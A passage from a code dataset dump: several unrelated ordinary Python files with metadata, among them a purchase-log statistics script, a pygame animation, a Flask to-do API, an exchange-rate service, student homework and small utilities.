transaction.purchase.entries]\n\t\telse:\n\t\t\tproducts = []\n\t\t\tproducts.append('')\n\t\tinputLine.dateNum, inputLine.weekday = dateToDateNumDb(transaction.time, startDate)\n\t\tif inputLine.dateNum<0 or inputLine.dateNum>(inputLine.numberOfDays):\n\t\t\tcontinue\n\t\tinputLine.user=transaction.user.name\n\t\tinputLine.price=transaction.amount\n\t\tfor inputLine.product in products:\t\n\t\t\tdatabase=addLineToDatabase(database, inputLine )\n\t\t\tinputLine.price = 0;\n\n\tprint('saving as default.dibblerlog...', end=' ')\n\tf=open('default.dibblerlog','w')\t\n\tline_format = '%s|%s|%s|%s|%s|%s\\n'\n\ttransaction_list = session.query(Transaction).all()\n\tfor transaction in transaction_list:\n\t\tif transaction.purchase:\n\t\t\tproducts = '¤'.join([ent.product.name for ent in transaction.purchase.entries])\n\t\t\tdescription = ''\n\t\telse:\n\t\t\tproducts = ''\n\t\t\tdescription = transaction.description\n\t\tline = line_format % ('purchase', transaction.time, products, transaction.user.name, transaction.amount, transaction.description)\n\t\tf.write(line.encode('utf8'))\n\tsession.close()\n\tf.close\n\t#bygg database.pengebeholdning\n\tif (inputType==3) or (inputType==4):\n\t\tfor i in range(inputLine.numberOfDays+1):\n\t\t\tif i > 0:\n\t\t\t\tdatabase.pengebeholdning[i] +=database.pengebeholdning[i-1]\n\t#bygg dateLine\n\tday=datetime.timedelta(days=1)\n\tdateLine=[]\n\tdateLine.append(startDate)\n\tfor n in range(inputLine.numberOfDays):\n\t\tdateLine.append(startDate+n*day)\n\tprint('done')\n\treturn database, dateLine\n\ndef buildDatabaseFromFile(inputFile, inputType, inputProduct, inputUser):\n\tsdate = input('enter start date (yyyy-mm-dd)? ')\n\tedate = input('enter end date (yyyy-mm-dd)? ')\n\t\t\n\tf=open(inputFile)\n\ttry:\n\t\tfileLines=f.readlines()\n\tfinally:\n\t\tf.close()\n\tinputLine = InputLine(inputUser, inputProduct, inputType)\n\tstartDate = getDateFile(fileLines[0].partition('|')[2].partition(' ')[0], sdate)\n\tendDate = getDateFile(fileLines[-1].partition('|')[2].partition(' ')[0], edate)\n\tinputLine.numberOfDays = (endDate-startDate).days\n\tdatabase = Database()\n\tdatabase = clearDatabase(database)\n\n\tif (inputType==3) or (inputType==4):\n\t\tdatabase.globalDatoVarer = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalDatoForbruk = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalUkedagForbruk = [0]*7\n\t\tdatabase.pengebeholdning = [0]*(inputLine.numberOfDays+1)\n\tfor linje in fileLines:\n\t\tif not (linje[0]=='#') and not (linje=='\\n') :\n\t\t\t#henter dateNum, products, user, price\n\t\t\trestDel = linje.partition('|')\n\t\t\trestDel = restDel[2].partition(' ')\n\t\t\tinputLine.dateNum, inputLine.weekday = dateToDateNumFile(restDel[0], startDate)\n\t\t\tif inputLine.dateNum<0 or inputLine.dateNum>(inputLine.numberOfDays):\n\t\t\t\tcontinue\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\tproducts = restDel[0]\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\tinputLine.user=restDel[0]\n\t\t\tinputLine.price=int(restDel[2].partition('|')[0])\n\t\t\tfor inputLine.product in getProducts(products):\t\n\t\t\t\tdatabase=addLineToDatabase(database, inputLine )\n\t\t\t\tinputLine.price = 0;\n\t#bygg database.pengebeholdning\n\tif (inputType==3) or (inputType==4):\n\t\tfor i in range(inputLine.numberOfDays+1):\n\t\t\tif i > 0:\n\t\t\t\tdatabase.pengebeholdning[i] +=database.pengebeholdning[i-1]\n\t#bygg dateLine\n\tday=datetime.timedelta(days=1)\n\tdateLine=[]\n\tdateLine.append(startDate)\n\tfor n in range(inputLine.numberOfDays):\n\t\tdateLine.append(startDate+n*day)\n\treturn database, dateLine\n\ndef printTopDict(dictionary, n, k):\n\ti=0\n\tfor key in sorted(dictionary, key=dictionary.get, reverse=k):\n\t\tprint(key, ': ',dictionary[key]) \n\t\tif i= self.screen_size[1]:\n self.y = randint(-100, self.screen_size[1] -\n self.screen_size[1] / 4)\n self.x = randint(0, self.screen_size[0])\n self.speed = randint(1, 3)\n self.y += self.speed\n self.speed += 0.01\n\n def show(self):\n self.pygame.draw.rect(self.screen, self.color,\n [self.x, self.y, self.w, self.h])\n\npygame.init()\npygame.display.set_caption('purple rain', 'rain-64.ico')\nicon = pygame.image.load('C:/Users/ENBSF/Documents/\\\nlul_dev/thecodingtrain/assets/rain-64.ico')\npygame.display.set_icon(icon)\nsize = width, height = 800, 600\n\nscreen = pygame.display.set_mode(size)\ndrops = [Drop(pygame, screen) for _ in range(500)]\nrun = 1\n\nwhile run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = 0\n\n screen.fill(pygame.Color(220, 220, 250, 1))\n for i in range(500):\n drops[i].fall()\n\n for i in range(500):\n drops[i].show()\n pygame.display.update()\n\npygame.quit()\n","sub_path":"purple_rain.py","file_name":"purple_rain.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355593798","text":"# Echo server program\nimport socket\nimport struct\n\nHOST = '127.0.0.1' # The remote host\nPORT = 7777 # The same port as used by the server\n\nisquit=False\n\nwhile True:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(5.0)\n s.connect((HOST, PORT))\n print('connect success')\n while True:\n try:\n cmd=raw_input('#')\n param=cmd.split(' ')\n mycmd=''\n for i in range(len(param)):\n mycmd=mycmd+param[i]\n mycmd=mycmd+' '\n mycmd=mycmd+\"\\r\\n\"\n s.sendall(mycmd)\n data = s.recv(1024)\n print(data)\n except:\n print('lose connection')\n cmd=raw_input(\"?reconnect[yes/no]\")\n if cmd == \"yes\":\n break\n else:\n isquit=True\n break\n if isquit:\n break\n s.close()\n\n\n","sub_path":"tools/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588115498","text":"import random\n\n#Runs a single 250 step simulation\ndef run_one_simulation(trainerLoc, capturesOnGrid, prob):\n count = 0\n totalPkmn = 0\n #Loops through 250 times for one simulation\n while(count<250):\n returnedTuple = move_trainer(trainerLoc, bounds, prob)\n trainerLoc = returnedTuple[0]\n isCaught = returnedTuple[1]\n if(isCaught ==1):\n capturesOnGrid[trainerLoc[0]][trainerLoc[1]] += 1 #Appends the grid if there is a pokemon at the location\n totalPkmn += 1\n count+=1\n return (capturesOnGrid, totalPkmn)\n\n\n#Checks boundaries, proceeds with direction, returns a tuple with new location\n#And whether a pokemon was caught or not\ndef move_trainer(location, bounds, prob):\n direction = random.randint(0, 3)\n \n #Boundary Definiton (Still catches pokemon at location)\n if(location[0] < 1 and direction == 0): #North\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0)\n \n elif(location[0] > bounds[0]-1 and direction == 1): #South\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0) \n \n elif(location[1] > bounds[1]-1 and direction == 2): #East\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0)\n \n elif(location[1] < 1 and direction == 3): #West\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0) \n \n #Proceeds with the direction movement\n else:\n if(direction == 0): #North\n newLocation = (location[0] - 1, location[1])\n elif(direction == 1): #South\n newLocation = (location[0] + 1, location[1])\n elif(direction == 2): #East\n newLocation = (location[0], location[1] + 1) \n else: #West\n newLocation = (location[0], location[1] - 1)\n \n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (newLocation, 1)\n else:\n return (newLocation, 0)\n'''\n'''\n'''\n'''\n'''\n'''\n\n#Variable Declaration\nrow = int(input(\"Enter the integer number of rows => \"))\nprint(row)\ncol = int(input(\"Enter the integer number of cols => \"))\nprint(col)\nprobability = float(input(\"Enter the probability of finding a pokemon (<= 1.0) => \"))\nprint(probability)\nnumSimulations = int(input(\"Enter the number of simulations to run => \"))\nprint(numSimulations)\nbounds = (row-1, col-1)\ntrainerLoc = (row//2, col//2)\ncount = 0\npokeCaught = 0\ntotalPokeCaught = 0\npokemonCaught = []\n\n#Declares the simulation grid\ncount_grid = []\nfor i in range(row):\n count_grid.append( [0]*col )\n\n#Seeds the random generator\nseed_value = 10*row + col\nrandom.seed(seed_value)\n\n#Appends the grid for each simulation run\nwhile(count maxPkmnSimulation):\n maxPkmnSimulation = pokemonCaught[i]\n maxIndex = i+1\n if(pokemonCaught[i] < minPkmnSimulation):\n minPkmnSimulation = pokemonCaught[i]\n minIndex = i+1\n\n#Finds the max/min pokemon caught on a single space\nmaxPkmnOnSpace = 0\nminPkmnOnSpace = 100\nfor i in range(row):\n for j in range(col):\n if(count_grid[i][j] > maxPkmnOnSpace):\n maxPkmnOnSpace = count_grid[i][j]\n if(count_grid[i][j] < minPkmnOnSpace):\n minPkmnOnSpace = count_grid[i][j]\n\n#Final output\nif(pkmnSum == 0):\n print(\"Total pokemon caught is\", pkmnSum)\n print(\"Minimum pokemon caught was\", minPkmnSimulation, \"in simulation\", minIndex)\n print(\"Maximum pokemon caught was\", maxPkmnSimulation, \"in simulation\", maxIndex) \n print(\"Max number of pokemon caught on a space is\", maxPkmnOnSpace)\n print(\"Min number of pokemon caught on a space is\", minPkmnOnSpace)\n \nelse:\n print(\"Total pokemon caught is\", pkmnSum)\n print(\"Minimum pokemon caught was\", minPkmnSimulation, \"in simulation\", minIndex)\n print(\"Maximum pokemon caught was\", maxPkmnSimulation, \"in simulation\", maxIndex)\n print(\"Max number of pokemon caught on a space is\", maxPkmnOnSpace, \"which was {:.2f}% of all pokemon caught\".format(maxPkmnOnSpace/pkmnSum*100))\n print(\"Min number of pokemon caught on a space is\", minPkmnOnSpace, \"which was {:.2f}% of all pokemon caught\".format(minPkmnOnSpace/pkmnSum*100))","sub_path":"Homeworks/Homework 5/hw5part2.py","file_name":"hw5part2.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352203131","text":"#!/usr/bin/env python3\n\nclass PersonException( Exception):\n def __init__(self,m=\"\"):\n self.m=m\n self.n=0\n\nclass Person(object):\n\n __slots__ = ( '__name', '__ort', \"__alter\")\n\n def __init__( self):\n self.__name=\"\"\n self.__ort=\"\"\n self.__alter=0\n\n def __getAlter(self): return self.__alter \n def __setAlter(self,x): \n if x <1 or x > 100: \n raise( PersonException(\"FELER!!!!\"))\n return\n self.__alter = x\n alter=property(__getAlter,__setAlter)\n\n def ausgeben(self):\n print()\n\nif __name__ == \"__main__\":\n \n try: \n p=Person()\n p.alter=7777777\n p.ausgeben()\n except PersonException as e:\n print(\"kkkk\",e.m)\n except Exception as e:\n print(\"kkkk\")\n \n\n","sub_path":"Schulung/python_sas/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"66984076","text":"from flask import Flask, jsonify, request\nimport sql_db\n\napp = Flask(__name__)\n\n@app.route('/tasks')\ndef apiShowTasks():\n list = sql_db.showAll()\n return jsonify(list)\n\n@app.route('/tasks', methods=['POST'])\ndef apiCreateTasks():\n if request.headers['Content-Type'] == 'application/json':\n new_user = request.json\n name = new_user['todo']\n if not sql_db.check_name(name):\n if new_user['urgent']:\n sql_db.insert_urgent(name)\n else:\n sql_db.insert(name)\n response = jsonify(sql_db.get_name(name))\n else:\n response = jsonify({ 'message' : \"Not Found!\"})\n response.status_code = 404\n else:\n response = jsonify({ 'message': \"Invalid Request\"})\n response.status_code = 404\n return response\n\n@app.route('/tasks/')\ndef apiGetTask(id):\n if sql_db.check_id(id):\n response = jsonify(sql_db.get_id(id))\n else:\n response = jsonify({ 'message' : \"Not Found!\"})\n response.status_code = 404\n return response\n\n@app.route('/tasks/' , methods=['PUT'])\ndef apiUpdateTask(id):\n if request.headers['Content-Type'] == 'application/json':\n new_user = request.json\n id = new_user['id']\n if sql_db.check_id(id):\n sql_db.update(id,new_user['todo'],new_user['urgent'])\n response = jsonify(sql_db.get_id(id))\n else:\n response = jsonify({ 'message' : \"Not Found!\"})\n response.status_code = 404\n else:\n response = jsonify({ 'message': \"Invalid Request\"})\n response.status_code = 404\n return response\n\n@app.route('/tasks/' , methods=['DELETE'])\ndef apiDeleteTask(id):\n if sql_db.check_id(id):\n jsonify(sql_db.remove(id))\n response = jsonify({ 'message' : \"Deleted!\"})\n else:\n response = jsonify({ 'message' : \"Not Found!\"})\n response.status_code = 404\n return response\n\nif __name__ == '__main__':\n app.run()","sub_path":"server_app.py","file_name":"server_app.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378605153","text":"import requests\nimport logging\nimport redis\nfrom time import time\n\nfrom flask import jsonify\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import Session\n\nfrom config.settings import OXR_APIKEY, DEFAULT_BASE, MYSQL_URI, REDIS_HOST, REDIS_PORT, \\\n REDIS_DB, REDIS_PWD, ROUND_DIGITS\nfrom models.models import ExchangeRate\n\n\n# setting up MySQL connection\nengine = create_engine(MYSQL_URI)\nsession = Session(engine)\n\n\n# setting up Redis connection\nredis_db = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_DB,\n password=REDIS_PWD, decode_responses=True)\n\ndef get_oxr_rate():\n \"\"\"\n Calls OXR API to get current exchange rate for the currency\n :return: dict - API response\n \"\"\"\n url = f'https://openexchangerates.org/api/latest.json?app_id={OXR_APIKEY}'\n r = requests.get(url)\n return r.json()\n\n\ndef limit_to_currency(currency):\n \"\"\"\n Get from OXR API data for selected currency\n :param currency: str. 3-letter code: GBP, EUR.\n `currency` can't be USD since we converting from it.\n :return: dict - exchange rate for specific currency\n \"\"\"\n data = get_oxr_rate()\n exchange_rate = data.pop('rates').get(currency)\n if not exchange_rate:\n logging.warning(f'Exchange rate for {DEFAULT_BASE} - {currency} not available in API.')\n else:\n rate = {\n 'timestamp': int(time()),\n 'base': data.get('base'),\n 'currency': currency,\n 'rate': exchange_rate\n }\n return rate\n\n\ndef calculate_final_amount(rate, original_amount):\n \"\"\"\n Calculates final amount of money in USD and return updated rate dict.\n :param rate: dict. Currency rates obtained from OXR API\n :param original_amount - amount in USD which needs to be converted.\n :return: dict - updated rates with converted money\n \"\"\"\n rate.update(\n {\n 'original_amount': original_amount,\n 'converted_amount': round(original_amount/rate.get('rate'), ROUND_DIGITS),\n }\n )\n\n\ndef save_to_mysql(rate):\n \"\"\"\n Saves calculated data to MySQL database\n :param rate: dict. Exchange rate information\n \"\"\"\n er = ExchangeRate(\n timestamp=rate.get('timestamp'),\n base='USD',\n currency=rate.get('currency'),\n rate=rate.get('rate'),\n original_amount=rate.get('original_amount'),\n converted_amount=rate.get('converted_amount'),\n )\n session.add(er)\n session.commit()\n\n\ndef save_to_redis(rate):\n \"\"\"\n Saves calculated data to Redis cache\n :param rate: dict. Exchange rate information\n \"\"\"\n key = f'{rate.get(\"timestamp\")}-{rate.get(\"currency\")}'\n redis_db.hmset(key, rate)\n\n\ndef grab_and_save_rate(currency, original_amount):\n \"\"\"\n Call OXR API with provided values and save output to MySQL and Redis\n :param currency: str - 3-letter code: GBP, EUR.\n `currency` can't be USD since we converting from it.\n :param original_amount: float - - amount in USD which needs to be converted.\n \"\"\"\n rate = limit_to_currency(currency)\n calculate_final_amount(rate, original_amount)\n save_to_mysql(rate)\n save_to_redis(rate)\n\n\ndef get_from_my_sql(n=None, currency=None):\n \"\"\"\n Query MySQL to get last operations which match criteria.\n :param n: int - number of operations\n :param currency: str - 3-letter code. Currency of exchange\n :return: list - operations performed.\n \"\"\"\n if n is None:\n n = 1\n if currency:\n ms_data = session.query(ExchangeRate).filter(ExchangeRate.currency == currency)\\\n .order_by(desc(ExchangeRate.timestamp)).limit(n)\n else:\n ms_data = session.query(ExchangeRate).order_by(desc(ExchangeRate.timestamp)).limit(n)\n return [ms.serialize for ms in ms_data]\n\n\ndef get_from_redis(n=None, currency=None):\n \"\"\"\n Query Redis to get last operations which match criteria.\n :param n: int - number of operations\n :param currency: str - 3-letter code. Currency of exchange\n :return: list - operations performed.\n \"\"\"\n if n is None:\n n = 1\n if currency:\n keys = [k for k in redis_db.keys() if currency in k]\n else:\n keys = [k for k in redis_db.keys()]\n keys.sort(reverse=True)\n return [redis_db.hgetall(keys[i]) for i in range(n)]\n\ndef jsonify_data(n=None, currency=None):\n \"\"\"\n Return jsonified response to be shown as API response\n :param n: int - number of operations\n :param currency: str - 3-letter code. Currency of exchange\n :return: json\n \"\"\"\n validation_error = validate_data(n, currency)\n if validation_error:\n return validation_error\n return jsonify(MYSQL=get_from_my_sql(n, currency),\n Redis=get_from_redis(n, currency))\n\n\ndef validate_data(n=None, currency=None):\n \"\"\"\n Validates user input to see if we have enough data for it.\n :param n: int - number of operations\n :param currency: str - 3-letter code. Currency of exchange\n :return: json - JSON error message to be shown for user.\n \"\"\"\n total_currency_records = 0\n if currency:\n total_currency_records = session.query(ExchangeRate).\\\n filter(ExchangeRate.currency == currency).count()\n total_records = session.query(ExchangeRate).count()\n if n and currency and total_currency_records < n:\n logging.warning(f'Requested last {n} exchanges for {currency}. Data only for '\n f'{total_currency_records}'\n f' rates present')\n return jsonify(APIWarning=f'Too large number of exchange rates for {currency}. '\n f'Only {total_currency_records} rates present')\n elif n and total_records < n:\n logging.warning(f'Requested last {n} exchanges. Data only for {total_records} '\n f'rates present')\n return jsonify(APIWarning=f'Too large number of exchange rates. Only '\n f'{total_records} rates present')\n elif currency and total_currency_records == 0:\n logging.warning(f'Exchange rates for {currency} were requested. No data in database.')\n return jsonify(APIWarning=f'There is no exchange rates for {currency} in database')\n elif total_records == 0:\n logging.warning('Exchange rates were requested. No data in database.')\n return jsonify(APIWarning='There is no exchange rates in database')\n else:\n return {}\n","sub_path":"utils/grab_and_save.py","file_name":"grab_and_save.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229297928","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nf_strFileName = os.path.split(__file__)[1]\nf_strFileBaseName = os.path.splitext(f_strFileName)[0]\nf_strAppName = __file__.split(os.path.sep)[-3]\n\nimport asyncio\nimport logging\nlogging.basicConfig(level = logging.INFO, format = '%(message)s \\n\\t %(levelname)s %(pathname)s:%(lineno)d(%(funcName)s)' )\n\nfrom bsn.common import asyncio_app\nfrom bsn.common import app_base as app\nfrom optparse import OptionParser\nfrom optparse import OptionGroup\n\ndef _parse_arg():\n parse = OptionParser()\n group = OptionGroup(parse, \n 'App Options',\n 'app special config')\n\n # group.add_option('-c','--config',\n # metavar='configDir',\n # action='store',\n # dest='config',\n # type=\"string\",\n # default = 'default',\n # help='config dir name')\n\n parse.add_option_group(group)\n return app.get_args(parse)\n\nclass CApp(app.CApp):\n def __init__(self, loop, *args):\n logging.info(\"{} args={}\".format(self, args))\n super().__init__(loop, f_strAppName, *args)\n\ndef create_app(loop, *args):\n logging.info(\"args={}\".format(args))\n return CApp(loop, *args)\n\nif __name__ == '__main__':\n args = _parse_arg()\n logging.info(\"args={}\".format(args))\n asyncio_app.main(create_app, args)","sub_path":"bsn/agent/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"632956530","text":"'''\nFile contains utility functions which are used by problem solutions\n'''\n\nimport math\n\ndef prime_factors(number):\n\t'''\n\tReturns a collection of number prime factors\n\t'''\n\t\n\tfactors = []\n\n\tpotential = 2\n\n\twhile number > 1:\n\n\t\twhile (number % potential == 0):\n\t\t\tfactors.append(potential)\n\t\t\tnumber = number / potential\n\n\t\tpotential = potential + 1\n\n\treturn factors\n\ndef prime_generator():\n '''\n Prime number generator\n '''\n \n for prime in [2,3,5,7,11,13,17,19]:\n yield prime\n \n prime = 23\n \n while True:\n dividers = [divider for divider in xrange(2, int(math.sqrt(prime)) + 1)]\n remainders = map(lambda div: prime % div, dividers)\n \n if 0 not in remainders:\n yield prime\n \n prime = prime + 1\n \ndef primes_upto(number):\n\t'''\n\tReturn primes ...\n\t'''\n\n\tprimes = [candidate for candidate in xrange(2, number+1) if len(prime_factors(candidate)) == 1]\n\n\treturn primes\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"520663228","text":"# coding: utf-8\nimport typing\n\nfrom sqlalchemy import and_\n\nfrom rolling.model.character import CharacterModel\nfrom rolling.server.document.build import BuildDocument\nfrom rolling.server.link import CharacterActionLink\n\nif typing.TYPE_CHECKING:\n from rolling.kernel import Kernel\n\n\nclass BuildLib:\n def __init__(self, kernel: \"Kernel\") -> None:\n self._kernel = kernel\n\n def place_build(\n self,\n world_row_i: int,\n world_col_i: int,\n zone_row_i: int,\n zone_col_i: int,\n build_id: str,\n under_construction: bool = True,\n commit: bool = True,\n ) -> BuildDocument:\n build_doc = BuildDocument(\n world_row_i=world_row_i,\n world_col_i=world_col_i,\n zone_row_i=zone_row_i,\n zone_col_i=zone_col_i,\n build_id=build_id,\n under_construction=under_construction,\n )\n self._kernel.server_db_session.add(build_doc)\n\n if commit:\n self._kernel.server_db_session.commit()\n\n return build_doc\n\n def get_build_doc(self, build_id: int) -> BuildDocument:\n return (\n self._kernel.server_db_session.query(BuildDocument)\n .filter(BuildDocument.id == build_id)\n .one()\n )\n\n def get_on_build_actions(\n self, character: CharacterModel, build_id: int\n ) -> typing.List[CharacterActionLink]:\n build_doc = self.get_build_doc(build_id)\n actions: typing.List[CharacterActionLink] = []\n\n for action in self._kernel.action_factory.get_all_with_build_actions():\n actions.extend(action.get_character_actions(character, build_id=build_id))\n\n return actions\n\n def get_zone_build(\n self,\n world_row_i: int,\n world_col_i: int,\n zone_row_i: typing.Optional[int] = None,\n zone_col_i: typing.Optional[int] = None,\n ) -> typing.List[BuildDocument]:\n filters = [\n BuildDocument.world_row_i == world_row_i,\n BuildDocument.world_col_i == world_col_i,\n ]\n\n if zone_row_i is not None and zone_col_i is not None:\n filters.extend(\n [BuildDocument.zone_row_i == zone_row_i, BuildDocument.zone_col_i == zone_col_i]\n )\n\n return self._kernel.server_db_session.query(BuildDocument).filter(and_(*filters)).all()\n\n def progress_build(\n self,\n build_id: int,\n real_progress_cost: float,\n consume_resources_percent: float,\n commit: bool = True,\n ) -> None:\n build_doc = self.get_build_doc(build_id)\n build_description = self._kernel.game.config.builds[build_doc.build_id]\n\n for required_resource in build_description.build_require_resources:\n quantity_to_reduce = required_resource.quantity * (consume_resources_percent / 100)\n self._kernel.resource_lib.reduce_stored_in(\n build_id,\n resource_id=required_resource.resource_id,\n quantity=quantity_to_reduce,\n commit=False,\n )\n\n build_doc.ap_spent = float(build_doc.ap_spent) + real_progress_cost\n\n if build_doc.ap_spent >= build_description.cost:\n build_doc.under_construction = False\n\n self._kernel.server_db_session.add(build_doc)\n\n if commit:\n self._kernel.server_db_session.commit()\n","sub_path":"rolling/server/lib/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217663404","text":"# Just contants for colors and text fx\nclass colors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n # A test text to test the constants\n \"\"\"print(colors.WARNING + \"Warning: No active frommets remain. Continue?\"\n + colors.ENDC)\"\"\"\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565824395","text":"from ..operators import *\nfrom .double import SilenceAction\n\n\nclass PlayOnlyPartsIdxs(ChordAction):\n def __init__(self, idxs, **kwargs):\n \"\"\"\n Silence a part\n \"\"\"\n self.idxs = idxs\n\n def action(self, chord: Chord, **kwargs):\n\n new_chord = chord.copy()\n parts = new_chord.parts\n for idx, part in enumerate(parts):\n if idx not in self.idxs:\n new_chord.score[part] = SilenceAction()(new_chord.score[part])\n\n return new_chord","sub_path":"musiclang/script/actions/play_on.py","file_name":"play_on.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"431013348","text":"# pylint: disable=missing-docstring\nimport unittest\n\ndef solve(fn_input):\n lines = fn_input[:-1].split(\"\\n\")\n i = 0\n steps = 0\n lines = list(map(int, lines))\n while i < len(lines):\n j = i\n i += lines[i]\n lines[j] += 1\n steps += 1\n return steps\n\nclass UnitTest(unittest.TestCase):\n def test_solve(self):\n self.assertEqual(solve(\"0\\n3\\n0\\n1\\n-3\\n\"), 5)\n","sub_path":"solvers/day05a.py","file_name":"day05a.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57901906","text":"#3 filenames\npath = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-13/'\npath2 = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-14/'\npath3 = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-16/'\n\nfn_trustedf = path + '2018-02-13_155025_TwoSpectrum.h5'\nfn_mxcon = path + '2018-02-13_155359_TwoSpectrum.h5'\nfn_mxcoffcomp = path + '2018-02-13_154552_TwoSpectrum.h5'\n\nfn_stillon = path + '2018-02-13_171542_TwoSpectrum.h5'\n\nfn_still_ptoff = path + '2018-02-13_165328_TwoSpectrum.h5'\n\nfn_v_base = path + '2018-02-13_191348_TwoSpectrum.h5'\nfn_v_base_on = path + '2018-02-13_191843_TwoSpectrum.h5'\n\nfn_v_prex = path2 + '2018-02-14_165956_TwoSpectrum.h5'\nfn_v_posx = path2 + '2018-02-14_175027_TwoSpectrum.h5'\nfn_v_bolts = path2 + '2018-02-14_181259_TwoSpectrum.h5'\nfn_v_nfloat = path2 + '2018-02-14_182119_TwoSpectrum.h5'\n\nfn_v_nfloat_on = path2 + '2018-02-14_182708_TwoSpectrum.h5'\nfn_v_float_on = path2 + '2018-02-14_190258_TwoSpectrum.h5'\n\nfn_v_float_off = path2 + '2018-02-14_191818_TwoSpectrum.h5'\n\nfn_lindriveon = path + '2018-02-13_160701_TwoSpectrum.h5'\nfn_lindriveoff = path + '2018-02-13_161633_TwoSpectrum.h5'\n\nfn_recent = path3 + '2018-02-16_193815_TwoSpectrum.h5'\n\nfn_v_lindriveon60hz = path3 + '2018-02-16_190300_TwoSpectrum.h5'\nfn_v_lindriveon75hz = path3 + '2018-02-16_191233_TwoSpectrum.h5'\nfn_v_lindriveoff75hz = path3 + '2018-02-16_192927_TwoSpectrum.h5'\n\n\nfn_vcopen_ptoff = [\n path + '2018-02-13_155025_TwoSpectrum.h5',\n path + '2018-02-13_175339_TwoSpectrum.h5',\n path + '2018-02-13_175955_TwoSpectrum.h5',\n]\n\nfn_vcclosed_ptoff = [\n path + '2018-02-13_181258_TwoSpectrum.h5',\n path + '2018-02-13_181926_TwoSpectrum.h5',\n path + '2018-02-13_183433_TwoSpectrum.h5',\n path + '2018-02-13_191348_TwoSpectrum.h5',\n path2+ '2018-02-14_165956_TwoSpectrum.h5',\n path2+ '2018-02-14_175027_TwoSpectrum.h5',\n path2+ '2018-02-14_181259_TwoSpectrum.h5',\n path2+ '2018-02-14_182119_TwoSpectrum.h5',\n path2+ '2018-02-14_191328_TwoSpectrum.h5',\n path2+ '2018-02-14_191818_TwoSpectrum.h5',\n path3+ '2018-02-16_182831_TwoSpectrum.h5',\n]\n\nfn_vcopen_pton = [\n path + '2018-02-13_155359_TwoSpectrum.h5',\n path + '2018-02-13_160056_TwoSpectrum.h5',\n path + '2018-02-13_160701_TwoSpectrum.h5',\n]\n\nfn_vcclosed_pton = [\n path + '2018-02-13_191843_TwoSpectrum.h5',\n #path2+ '2018-02-14_182708_TwoSpectrum.h5',\n #path2+ '2018-02-14_183445_TwoSpectrum.h5',\n #path2+ '2018-02-14_185853_TwoSpectrum.h5',\n path2+ '2018-02-14_190258_TwoSpectrum.h5',\n path2+ '2018-02-14_190841_TwoSpectrum.h5',\n path2+ '2018-02-14_192242_TwoSpectrum.h5',\n path2+ '2018-02-14_192802_TwoSpectrum.h5',\n path3+ '2018-02-16_184504_TwoSpectrum.h5',\n path3+ '2018-02-16_191233_TwoSpectrum.h5',\n]\n\ndef vcopen_pton():\n v = Vibrations()\n ls = []\n ls.append(v.getlsd(fn_vcopen_pton[0], minfreq=.2, vparam='v2'))\n ls.append(v.getlsd(fn_vcopen_pton[1], minfreq=.2, vparam='v2'))\n ls.append(v.getlsd(fn_vcopen_pton[2], minfreq=.2, vparam='v2'))\n fig,ax = plt.subplots()\n for l in ls:\n ax.loglog(l[0], np.sqrt(l[1])/.1024/9.8)\n ax.set_xlabel('Hz')\n ax.set_ylabel('g/sqrt(Hz)')\n return 